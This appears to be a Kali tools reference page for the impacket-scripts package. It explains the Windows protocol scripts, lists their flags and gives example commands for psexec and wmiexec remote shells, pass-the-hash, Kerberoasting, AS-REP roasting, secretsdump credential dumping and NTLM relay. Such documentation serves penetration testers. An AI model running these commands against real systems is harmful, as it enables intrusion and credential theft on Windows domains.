Post Exploitationwindowsactive-directorysmbkerberosntlmrpcldapexploitationcredential-access

Impacket Scripts

Collection of Python scripts from the Impacket library providing Windows protocol client implementations for SMB, MSRPC, Kerberos, and Active Directory operations.

Description

Impacket-scripts is a Kali Linux package containing symbolic links to useful Impacket scripts, separating them from the main Debian impacket package for easy access in the PATH. These scripts implement various Windows network protocols including SMB, MSRPC, Kerberos, LDAP, and more, enabling penetration testers to interact with Windows systems for enumeration, exploitation, and post-exploitation activities.

The package supports a wide range of operations such as NTLM authentication parsing, Group Policy password extraction, Active Directory enumeration, Kerberos ticket manipulation, remote command execution, service management, and privilege escalation techniques. Scripts target domain controllers, workstations, and servers across different protocols and authentication mechanisms.

Use cases include Active Directory reconnaissance (GetADUsers, GetADComputers), Kerberos attacks (GetUserSPNs, GetNPUsers), SMB execution (psexec, smbexec), credential dumping (ntlmrelayx), and advanced persistence techniques like WMI event subscriptions and RBCD attacks.

How It Works

Scripts implement Windows network protocols using pure Python: SMB for file/service operations, MSRPC/DCOM for remote execution, Kerberos for ticket-based auth, LDAP for directory queries, and NTLM for challenge-response auth. They support multiple authentication methods (passwords, NTLM hashes, Kerberos tickets, AES keys) and connect via TCP ports (445/SMB, 135/RPC, 389/LDAP, 88/Kerberos). Many leverage Impacket's protocol libraries to parse structures, forge packets, and relay authentication for attacks like Kerberoasting, AS-REP roasting, and NTLM relay.

Installation

bash

sudo apt install impacket-scripts

Flags

-h, --helpshow this help message and exit

-debugTurn DEBUG output ON

-tsAdds timestamp to every logging output

-hashes LMHASH:NTHASHNTLM hashes, format is LMHASH:NTHASH

-no-passdon't ask for password (useful for -k)

-kUse Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME)

-aesKey hex keyAES key to use for Kerberos Authentication (128 or 256 bits)

-dc-ip ip addressIP Address of the domain controller

-target-ip ip addressIP Address of the target machine

Examples

Get interactive SYSTEM shell via SMB on target using plaintext credentials

impacket-psexec domain/administrator:Password123@192.168.1.10

Kerberoast — dump Kerberos service tickets for all SPNs (offline crackable)

impacket-GetUserSPNs domain.local/user:pass -dc-ip 192.168.1.1 -request

AS-REP Roasting — get crackable TGTs for accounts with pre-auth disabled

impacket-GetNPUsers domain.local/ -usersfile users.txt -no-pass -dc-ip 192.168.1.1

Dump NTLM hashes, LSA secrets, and cached credentials from a Windows host

impacket-secretsdump domain/admin:pass@192.168.1.10

NTLM relay attack — relay captured hashes to SMB on all targets in list

impacket-ntlmrelayx -tf targets.txt -smb2support

Semi-interactive PowerShell execution over SMB (no binary upload)

impacket-smbexec domain/user:pass@192.168.1.10 -shell-type powershell

Remote code execution via WMI using pass-the-hash (NTLM)

impacket-wmiexec domain/admin@192.168.1.10 -hashes :aad3b435b51404eeaad3b435b51404ee

Enumerate all Active Directory user accounts and their attributes

impacket-GetADUsers -all domain.local/user:pass -dc-ip 192.168.1.1

Updated 2026-04-16kali.org ↗